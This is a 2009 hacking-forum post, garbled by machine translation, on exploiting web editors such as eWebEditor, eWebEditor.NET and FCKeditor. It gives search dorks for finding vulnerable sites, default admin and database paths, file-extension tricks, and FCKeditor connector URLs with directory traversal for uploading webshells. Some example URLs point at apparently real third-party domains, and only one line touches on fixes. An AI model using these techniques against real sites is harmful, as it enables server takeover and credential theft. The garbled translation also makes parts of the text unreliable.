Editor vulnerability summary-vulnerability warning-the black bar safety net

2009-08-07T00:00:00
ID MYHACK58:62200924198
Type myhack58
Reporter 佚名
Modified 2009-08-07T00:00:00

Description

How to search editor vulnerability?

site:editor inurl:asp? id inurl:ewebeditornet

Such as the common editor of the vulnerability are:

ewebeditor ewebeditornet fckeditor editor southidceditor SouthidcEditor bigcneditor

A:ewebeditor is an example

1:default download down the back:

http://www.test.com/ewebeditor/admin_login.asp

Background if can enter:

You can click on the style of management:

standard copy(directly modified modified not)

In the copy of a copy of Riga into the picture type( asa aaspsp ) and then point to preview

The editor in point of design, and then directly upload asa Malaysia.

After uploading the code, you can see the horse's position!

(Principle:because in iis in the site attribute in the application configuration an asa extension or with asp. dll to parse,asp is also there are cer cdx )

In cer, cdx, asa is deleted then the horse will not find the map but to.

Can copy after the style of the picture type Riga into the aaspsp and then in the upload directly, you can upload the asp file

2:Download the default database

www.test.com/ewebeditor/db/ewebeditor.mdb

Then the analysis of the database

webeditor_system(1) You can see the user name and password if the crack is not out

In webeditor_style(1 of 4 styles table

Mainly to see the allowed Upload file extension(s-fileext s_ingeext)

See a small hack ever to engage in too much asa aaspsp

You can use him to use! (The background can't find the case you can also use this method)

You can construct the statement:

Such as ID=4 6 s-name =standard1

Configuration code: ewebeditor. asp? id=content&style=standard

ID and and the style name changed after

ewebeditor. asp? id=4 6&style=standard1

Then it's into the editor to upload asa or asp to get webshell

II:ewebeditornet exploit

The default upload address:

www.test.com/ewebeditornet/upload.aspx

You can directly Upload a cer Trojan

Unable to upload the case

Can the address bar constructed the following code: javascript:lbtnUpload. click();

Then view the source code:

Find uploadsave find the address

The default passed to uploadfile to this folder.

(Bug fixes: can the iss in directly to the upload folder execute permissions, select None. )

Three:fckeditor exploit

http://www.test.com/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=FileUpload&Type=Image&CurrentFolder=/ Put the file name of the segment changed NEWfile to choose File name can be defined Upload later in/userfiles/image/find file

Four: southidceditor

http://www.xhkjit.com/admin/southidceditor/datas/southidceditor.mdb

http://www.xhkjit.com/admin/southidceditor/popup.asp

http://www.xhkjit.com/admin/southidceditor/admin/admin_login.asp

Five: bigcneditor

This page not much to say

Principle almost!

Prevention method is very simple it does not speak,

FCKeditor upload vulnerability,

http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector. asp

Open this address you can upload any type of file, the horse is uploaded to the location is: http://www.xxx.com/UserFiles/all/1.asa "Type=all" this variable is defined,here to create all this directories,and new directories not Upload File format restrictions.

For example, enter: http://www.xxx.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=monyer&Connector=connectors/asp/connector. asp

The transmission of the file to http://www.xxx.com/UserFiles/monyer/ a

And if this is the input:http://www. xxx. com/admin/FCKeditor/editor/filemanager/browser /default/browser. html? Type=../&Connector=connectors/asp/connector. asp It can be transmitted to a website under the root directory,the site support what the script. what the script of the horse.

The transmission of the file to the web root directory.

http://www.b-horse.cn/newEbiz1/EbizPortalFG/portal/html/BBSThreadMessageMaint.html?forumID=46&threadID=4 5 7&messageID=5 3 2&ListType=FromForum&FromCurrentPage=1&time=1 2 1 9 2 8 2 2 3 2 7 8 1